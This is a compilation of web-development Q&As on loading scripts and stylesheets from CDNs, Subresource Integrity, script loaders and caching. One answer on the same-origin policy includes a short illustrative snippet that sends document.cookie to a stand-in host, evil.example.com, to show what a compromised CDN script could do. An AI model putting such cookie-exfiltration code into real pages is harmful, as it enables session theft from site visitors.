Content distribution network (CDN): loading a CSS or JavaScript library - javascript

I am using knitrBootstrap for some projects, and I am beginning to learn jQuery (JavaScript) and CSS to make some modifications to the generated pages. I understand that CSS files and scripts are usually placed in separate files and loaded into an HTML document from the same domain (or locally), but when I read the documentation of both libraries I see that they can be loaded from a CDN provider, and that the HTML files generated by knitrBootstrap also do that.
E.g.: http://rawgithub.com/jimhester/knitrBootstrap/master/vignettes/illusions.html (lines 18-24)
<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js"></script>
<!-- bootstrap -->
<link href="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" rel="stylesheet">
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
This seems very nice, since it lets the page load static resources from a third-party provider and spares resources on your own server when hosted. However, I was also a little concerned about the security implications (not exactly for my purposes, but for webpages using this in general) and therefore searched around. I found the concept of the same-origin policy, and from what I understand, the functions provided by jQuery should not be allowed to change the DOM objects of the page itself, yet they do.
Why are the jQuery code and the Bootstrap CSS allowed to alter the rest of the document even though they are not loaded from the same domain but from another one (in this case a CDN)?

There is nothing stopping the CDN from replacing the files, and of more concern, there is nothing stopping someone else from replacing those files maliciously without the CDN being aware of it, except whatever unknown security measures are in place there.
The reason the community is usually willing to ignore that potential flaw is one huge benefit of CDNs: the ability for all sites to use the exact same CDN URL for a given file. For example, imagine that every major site used the CloudFlare CDN link for jQuery. When you, as a user, visit another major site that also uses it, you save your own bandwidth by using a likely cached copy of the file. This brings up the other major point: the site is not spending any of its own bandwidth serving the file or handling requests for it.
However, getting to your question: the same-origin policy does not apply to loading scripts or CSS; it applies to in-page requests (see: Ajax) made by your scripts, in order to help prevent cross-site scripting (XSS). The intent is that you, as the site creator, are in control of which scripts get loaded, but your in-page requests could easily be tricked into making cross-site requests, potentially exposing data that should not be exposed (e.g., session variables). The key is that when the browser makes the request to the CDN, it does not send the CDN your session variables or any other cookies it should not get (your domain's). However, once the script is executing, it does have access to your domain's cookies, and it can forward them to any other site, with no same-origin policy standing in the way.
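To make the risk concrete, here is a minimal sketch of what a malicious script served from a compromised CDN could do once it executes in your page (the collection URL is hypothetical):

// This code runs with the including page's origin, so it can read
// that page's cookies.
var stolen = encodeURIComponent(document.cookie);
// Image requests are not blocked by the same-origin policy, so the
// cookies can be forwarded to an arbitrary third-party server.
new Image().src = 'https://evil.example.com/collect?c=' + stolen;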
Unlike JavaScript, CSS does not execute code directly; rather, it specifies a bunch of properties that have a visual effect on your page (which causes the browser to execute code to make that happen, potentially including downloading images referenced by the CSS).

Related

Subresource integrity and cache busting techniques in PHP

I'd like to implement Subresource Integrity and cache busting for static assets such as stylesheets and JavaScript files in my application. Currently I use PHP with Twig templates.
I know there are many tools out there to generate hashes for all the JS and CSS files but I am looking for how to implement the hashes into the <script> and <link> tags for hundreds of files.
This blog post describes most of what I'm trying to do; however, the author only covers cache busting, and he uses a static timestamp in the file name that he changes manually every time. Using a build tool to programmatically generate that timestamp isn't difficult either, but with SRI the value is a hash, which is different for every file.
For example, a snippet of header.html.twig:
<!-- cdn requests -->
<script src='https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js'
integrity='sha384-8gBf6Y4YYq7Jx97PIqmTwLPin4hxIzQw5aDmUg/DDhul9fFpbbLcLh3nTIIDJKhx'
crossorigin='anonymous'></script>
<!-- same-origin requests -->
<script src='foo.1a516fba.min.js'
integrity='sha384-GlFvui4Sp4wfY6+P13kcTmnzUjsV78g61ejffDbQ1QMyqL3lVzFZhGqawasU4Vg+'></script>
<script src='bar.faf315f3.min.js'
integrity='sha384-+vMV8w6Qc43sECfhc+5+vUA7Sg4NtwVr1J8+LNNROMdHS5tXrqGWSSebmORC6O86'></script>
Changing the src/href and integrity attributes every time is not a sane approach.
I could write a Twig function that calls a PHP function to hash the file every time, and it might work OK in dev, but that seems awfully computationally expensive.
What is a feasible approach to this?
To answer your question: There is no feasible approach because this is not a proper application of Subresource Integrity.
According to W3C the integrity attribute is:
...a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation
It was introduced because these days lots of pages fetch their CSS and JS from CDNs, as you are, and if a hacker were ever to gain control of a CDN they could wreak an extraordinary amount of havoc across thousands of websites by injecting malicious code into the delivered resources!
Imagine if every version of jQuery delivered by code.jquery.com or ajax.googleapis.com suddenly contained malicious code! How many sites would be affected? Scary.
By providing the agent (browser) with an integrity hash to compare the contents of the fetched resource against, you ensure the agent only executes the code if it gets exactly what you told it to expect. If it's different, don't trust it!
In the case of the resources in your application, I assume they exist on the same server so there is no middle route to intercept. If a hacker gains control of your server and injects malicious code in the JS scripts, they could just as easily rehash the contents and change the integrity attribute in your HTML as well. Subresource Integrity offers no additional security check.
But...
Just for the sport of solving what is quite a fun problem, here is what I would suggest if you wanted to dynamically generate the hash for the integrity attribute:
Use Gulp (my personal preference) to concatenate, minify, and thumbprint the filename of your resource. Read the contents of the generated file using gulp.src('bar.*.min.js'), create the hash as a variable (note that browsers only accept sha256, sha384, or sha512 for the integrity attribute, so Node's built-in crypto module is a better fit than the NPM sha1 package), and finally maybe use gulp-inject to change the src attribute and then gulp-replace to write the integrity attribute too. Some flow like that is what I would go for :-)
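A minimal sketch of the hashing step under those assumptions, using only Node's built-in modules (the file path is hypothetical):

// Compute an SRI-compatible integrity value for a built asset.
const crypto = require('crypto');
const fs = require('fs');

function sriHash(filePath) {
    const contents = fs.readFileSync(filePath);    // the exact bytes the browser will fetch
    const digest = crypto.createHash('sha384')     // SRI accepts sha256/sha384/sha512
        .update(contents)
        .digest('base64');                         // SRI values are base64, not hex
    return 'sha384-' + digest;
}

// E.g., inside a Gulp task, after concatenation/minification:
console.log(sriHash('dist/bar.faf315f3.min.js'));  // hypothetical built file

The returned string is exactly what belongs in the integrity attribute, so a gulp-replace step can write it into the template.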
I hope that answers your question.

Why can't I load external scripts from outside servers while Modernizr.load can?

I keep having this doubt in my mind. I want to test whether a URL exists before loading the script from that URL, but the way I'm trying to do it fails: I'm using XMLHttpRequest, and as many know, when you use this method to GET a file from a server that is not the same one the executing script came from, what you get back is a "not allowed by Access-Control-Allow-Origin" error.
So how come the Modernizr.load() method can theoretically load the scripts, while I cannot even see whether there's actually something there?
Because Modernizr.load(), as #dm03514 mentions, loads the script not through XMLHttpRequest but by inserting a <script> tag, which is not subject to the cross-domain restriction. It then tries to check whether the script loaded correctly, but that is not an easy task and may not be possible in all browsers. For more detail, see this compilation of how well different browsers support the various options for detecting whether scripts/CSS loaded successfully: http://pieisgood.org/test/script-link-events/
As for why XMLHttpRequest fails, you can read more about cross-domain restrictions at MDN: https://developer.mozilla.org/en-US/docs/HTTP_access_control
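As a minimal sketch of the tag-insertion technique (the load/error events are exactly the part whose browser support varies, per the link above):

function loadScript(url, onSuccess, onFailure) {
    var script = document.createElement('script');
    script.src = url;                 // cross-origin URLs are allowed here
    script.onload = function () {     // fires once the script has been fetched and executed
        onSuccess(url);
    };
    script.onerror = function () {    // fires if the fetch failed (not supported by all older browsers)
        onFailure(url);
    };
    document.getElementsByTagName('head')[0].appendChild(script);
}

An XMLHttpRequest to a CDN URL would be blocked by the cross-domain restriction, but passing the same URL to loadScript works.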
Some motivations for using script loaders are:
Loading scripts based on conditions, which is what yepnope and YUI do
Loading scripts asynchronously for performance reasons (<script> tags block the rendering of the page)
Dependency injection (loading resources that other scripts need; this is what requirejs does)
Loading scripts when certain events happen (e.g., loading new functionality when a user clicks on a tab)
Also, when you use script loaders, you usually load everything through them, including your application code, so that your application code has access to all its dependencies. The require.js model (Google "AMD modules") is a great way of organizing your app: it allows you to write small modules that do specific tasks and reuse them, instead of one big file that does everything.
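A minimal AMD sketch (the module names here are hypothetical): each file defines one small module and declares its dependencies, and require.js loads those before running the factory function:

define('cart', ['jquery', 'storage'], function ($, storage) {
    // This factory only runs after the jquery and storage modules have loaded.
    return {
        add: function (item) {
            storage.save(item);
            $('#cart-count').text(storage.count());
        }
    };
});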

html5: a good loading approach?

I'm writing my first HTML5 + jquery.mobile web app.
The app is basically a menu which redirects to internal pages (data-role="page") defined in the same index.html. I do not write the pages as external files, to avoid reloading and rewriting the (substantially) same <head>: I suppose it's faster to jump to an internal anchor than to load a new page...
Now, I have a page which needs some specific jquery plugins and some specific css. No other page needs these plugins or css.
Of course I could load these js/css in the main <head> section, but this approach would slow the first page loading, uselessly.
I could solve the problem with CSS, with:
$('head:first').append('<link rel="stylesheet" type="text/css" href="' + file + '" />');
I could even solve the problem with JS, but only for 'standard' JavaScript, with something like:
<script>
$(document).ready(function () {
    $('#page-availability').live('pageinit', function () {
        $.getScript("js/jqm-datebox.core.js");
        $.getScript("js/jqm-datebox.mode.calbox.js");
        $.getScript("js/jquery.mobile.datebox.i18n.en.utf8.js");
        $('#datepicker').data({
            "mode": "calbox",
            ...
        });
        ...
    });
    ...
});
</script>
Unfortunately, this approach seems not to work with jQuery plugins (Firebug croaks: "TypeError: a.mobile.datebox is undefined"...): it looks like they are not evaluated (even though they are there, before the end of the <head> section, when viewing the "Generated Source"...).
I'm using Firefox (15) to debug, but I suppose this isn't the point...
Any hint?
The one page approach can be good for mobile if:
You don't have to load too much extra content in order to support all the content the user might show from that one page.
You don't have to load too much code to support all the behaviors.
The typical user actually does go to several different virtual pages so the scheme saves them load time and makes things quicker on subsequent virtual page loads.
Done well, the user gets OK performance on loading the first page and very quick performance when going to the other "embedded" pages that don't have to load new content over the network.
The one page approach is not so good if:
The initial load time is just more than it's worth because of the volume of stuff that must be loaded.
You have to dynamically load content for the sub-pages anyway.
You have SEO issues because the search engine can't really find/properly index all your virtual pages.
So, in the end, it's a real tradeoff and depends very much on how big things are, how many things you're loading and what the actual performance comes out to be. A compact mobile site can serve server-loaded page views from one page to the next pretty quickly if the pages are kept very lightweight and there are very few requests that must be satisfied for each page.
In general, you want to pursue these types of optimizations:
Compress/minify all javascript.
Reduce the number of separate items that must be loaded (stylesheets, javascript files, images).
Reduce the number of sequential things that must be loaded (load one, wait for it to load, load another). Mobile is bad at round-trips and loading lots of resources. It's OK at loading a few things.
Make it easy for the browser to cache JavaScript files. Use a few common JavaScript files that each serve the needs of many pages. Loading a little more at the start and then letting the JavaScript file be loaded from cache on all future page loads is way, way better if the user will be visiting many successive pages on your site. The same is true for external CSS files.
Be very, very careful with lots of images, even small images. Lots of HTTP requests to load a page is bad for load time on mobile, and every image you request is an HTTP request (unless it comes from the browser cache).
Make sure your server is configured to maximize browser caching for things that can be effectively cached.
Other things to be aware of:
By default, dynamic loading of script files is asynchronous and unordered. If your script files must execute in a specific order, then you will have to either not load them dynamically or write code (or use a library) that serializes their execution in the desired order.
$.getScript is a shorthand Ajax function; it takes a callback as its second parameter.
Check out the docs:
http://dochub.io/#jquery/jquery.getscript
You could concatenate those scripts and then do your stuff in the callback.
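If you keep the files separate instead, a minimal sketch (reusing the question's file names, and .on() rather than the deprecated .live()) is to nest the callbacks so the scripts execute in order:

$(document).on('pageinit', '#page-availability', function () {
    $.getScript('js/jqm-datebox.core.js', function () {
        $.getScript('js/jqm-datebox.mode.calbox.js', function () {
            $.getScript('js/jquery.mobile.datebox.i18n.en.utf8.js', function () {
                // All three scripts have executed, in order, so the plugin
                // exists by the time the widget is initialized.
                $('#datepicker').data({ "mode": "calbox" });
            });
        });
    });
});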
This is not so dissimilar to old Flash asset loading issues.
My strategy for that? Load only what's necessary for the initial page view. When it's loaded and the page/app is viewable by the user, progressively load all other assets.
If the assets were particularly heavy, then I would disable the link to that specific page until its required assets were loaded.
In this case, you might disable the link to the particular page at the outset, initiate the load of its assets, and when they are ready, enable the link.
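A minimal sketch of that strategy, assuming a hypothetical link element and reusing the question's script paths (the .then chaining needs jQuery 1.8+):

var $link = $('#availability-link').addClass('ui-disabled'); // hypothetical link to the heavy page
$.getScript('js/jqm-datebox.core.js')
    .then(function () { return $.getScript('js/jqm-datebox.mode.calbox.js'); })
    .then(function () {
        // Both scripts are loaded and have executed in order;
        // the page is now safe to visit.
        $link.removeClass('ui-disabled');
    });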
Not sure if you're having any syntax issues, but you can certainly just inject a new script element into the head with the correct source, and it will instigate a download (like you are doing with the CSS, but you probably know that ;D).
Cheers
I would just combine/minify and compress all the JS into one file and always load that. With correct caching it is only downloaded once, so you don't have to worry much about performance.
Of course I could load these js/css in the main <head> section
I often just add it just before the </body> tag. Also note that besides the fact that .live() is deprecated, it is also slow as hell, so don't use it; use .on() instead.

grails specifying javascript library

In my grails app, we use jquery. I include jquery on the necessary pages with
<g:javascript library="jquery"/>
If we decide to change javascript libraries, I need to update every page. I know I can include this in the layout, but the library is not needed on every page, so that seems wasteful.
Is there a typical way in grails to specify in one place what the default javascript library should be and then to just include that default one without specifying that it is jquery (or whatever it is) on every page?
Since most browsers heavily cache things like JavaScript libraries, putting the library include into the layout is probably better than putting it in each individual page. The heavy caching means users will only load the library from the server once for your whole site (or at least their browsing session), and by handling it in the layout you drastically reduce your maintenance load (which you alluded to).
In general, your JavaScript libraries should be highly cached, and in many cases it's preferable to pull them from a heavily used CDN, like Google's. Your "local" (i.e., from your server) copy of the library should only get requested if the CDN provider goes down and the browser can't reach their copy. (Take a look at the HTML5 Boilerplate project for how this is done.)
Because of that, I wouldn't worry about the very minimal performance hit that putting the library into the layout page would incur. Even if you don't use a well-used CDN for your library, any browser that people actually use today will only load your JavaScript library once (on the first page that includes it) and will simply use its cached copy for the rest of the pages on your site.
So, in a nutshell, put it in the layout page and don't worry about it. It will only be requested on the first page load, and will come from the cache for all subsequent loads, and your codebase will be DRYer.
You could also create an external JS file that selectively loads the file(s) you specify. Something like this:
//FILENAME: jselector.js
if ( [conditions] ) {
    var filename = "js/jquery.min.js"; // hypothetical path: reference your jQuery file here
    var fileref = document.createElement('script');
    fileref.setAttribute("type", "text/javascript");
    fileref.setAttribute("src", filename);
    document.getElementsByTagName("head")[0].appendChild(fileref);
}
Then put a reference to this file (jselector.js) in each of the pages that need it.
<script type="text/javascript" src="jselector.js"></script>
If your jQuery file ever changes, you update this single external JS (jselector.js), and all of the pages will automatically point to the new jQuery.

How to determine if a JavaScript file was already loaded by another HTML file

How can I determine whether a JavaScript file was already loaded by another HTML file? I want to reduce redundant loading of JavaScript files to decrease the loading time of my webpages.
If your web server provides correct caching headers this shouldn't be necessary; the browser will cache the JavaScript file across multiple requests.
You might want to check out the YDN page Best Practices for Speeding Up Your Web Site
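To make "correct caching headers" concrete, here is a minimal sketch assuming an Express-style Node server (the route and directory are hypothetical):

const express = require('express');
const app = express();

// Serve static assets with long-lived caching headers so the browser
// reuses its copy instead of re-downloading the file on every page.
app.use('/js', express.static('public/js', {
    maxAge: '30d',   // sends Cache-Control: max-age=2592000
    etag: true       // allows cheap revalidation via If-None-Match
}));

app.listen(3000);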
If you want to prevent the files from being downloaded twice, this will be automatic provided they are set to be cacheable (most web servers should set these headers sensibly by default).
If you want to make sure that the include happens only once when including files in a dynamic language, then you will need some sort of manager. ASP.NET provides a ScriptManager class that does this (among other things); I cannot speak for other languages and frameworks.
As Rory says, the second request will probably be cached. Note that this is a bit of a design failure if it can happen, and that the cached file will still execute, with the same negative effect.
This is horrible, but you could wrap your JS script like this:
if (!document.foo) {
    // your script here
    document.foo = true; // flag so any later copy of this script does nothing
}
